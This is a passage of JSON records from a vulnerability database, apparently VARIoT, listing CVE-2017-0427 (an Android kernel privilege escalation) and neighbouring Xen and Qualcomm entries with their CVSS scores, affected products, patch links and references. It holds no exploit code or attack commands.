        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009142"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1593"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2694"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1813.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=714867"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/242"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/45897/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/45897/#comments"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45897"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/trial/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/46308/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://googlechromereleases.blogspot.com/2011/10/stable-channel-update.html"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46308"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/46308/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47825/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47825/#comments"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47825"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "104863"
      },
      {
        "db": "PACKETSTORM",
        "id": "105568"
      },
      {
        "db": "PACKETSTORM",
        "id": "109261"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "104863"
      },
      {
        "db": "PACKETSTORM",
        "id": "105568"
      },
      {
        "db": "PACKETSTORM",
        "id": "109261"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-08-30T00:00:00",
        "db": "BID",
        "id": "49375"
      },
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2014-01-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "date": "2012-01-31T06:49:21",
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "date": "2011-09-07T00:57:26",
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "date": "2012-01-30T12:12:00",
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "date": "2011-12-14T02:33:20",
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "date": "2011-09-07T05:27:48",
        "db": "PACKETSTORM",
        "id": "104863"
      },
      {
        "date": "2011-10-05T02:52:10",
        "db": "PACKETSTORM",
        "id": "105568"
      },
      {
        "date": "2012-01-31T06:49:27",
        "db": "PACKETSTORM",
        "id": "109261"
      },
      {
        "date": "2013-12-27T01:55:00",
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-04-03T18:07:00",
        "db": "BID",
        "id": "49375"
      },
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2014-01-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "date": "2020-12-08T15:25:00",
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "date": "2013-12-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      },
      {
        "date": "2012-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote \u203b local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xen SAHF Emulation Denial of Service Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "109261"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.8
  }
}

var-201702-0743
Vulnerability from variot

An elevation of privilege vulnerability in the kernel file system could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31495866. GoogleNexus9 is a tablet from Google Inc. in the United States. Google Nexus is prone to a privilege-escalation vulnerability

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0743",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus player",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "BID",
        "id": "96071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qidan He (@flanker_hqd) and Di Shen (@returnsme) of KeenLab, Tencent.",
    "sources": [
      {
        "db": "BID",
        "id": "96071"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0427",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0427",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-01591",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0427",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0427",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01591",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-306",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0427",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the kernel file system could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31495866. GoogleNexus9 is a tablet from Google Inc. in the United States. Google Nexus is prone to a privilege-escalation vulnerability",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "BID",
        "id": "96071"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0427",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96071",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "db": "BID",
        "id": "96071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "id": "VAR-201702-0743",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      }
    ]
  },
  "last_update_date": "2023-12-18T10:53:13.137000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexusKernelFileSystem privilege escalation vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89443"
      },
      {
        "title": "Android kernel Fixes for file system permissions and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67590"
      },
      {
        "title": "Debian CVElist Bug Report Logs: CVE-2016-3921 CVE-2016-3885 CVE-2016-3861",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=86dac5175f9092153571fdd37dcd5773"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96071"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0427"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0427"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=858177"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "db": "BID",
        "id": "96071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "db": "BID",
        "id": "96071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "BID",
        "id": "96071"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "date": "2017-02-08T15:59:01.317000",
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01591"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0427"
      },
      {
        "date": "2017-03-07T02:02:00",
        "db": "BID",
        "id": "96071"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0427"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerability in Elevated File System Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001501"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-306"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0754
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32450647. References: QC-CR#1092059. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
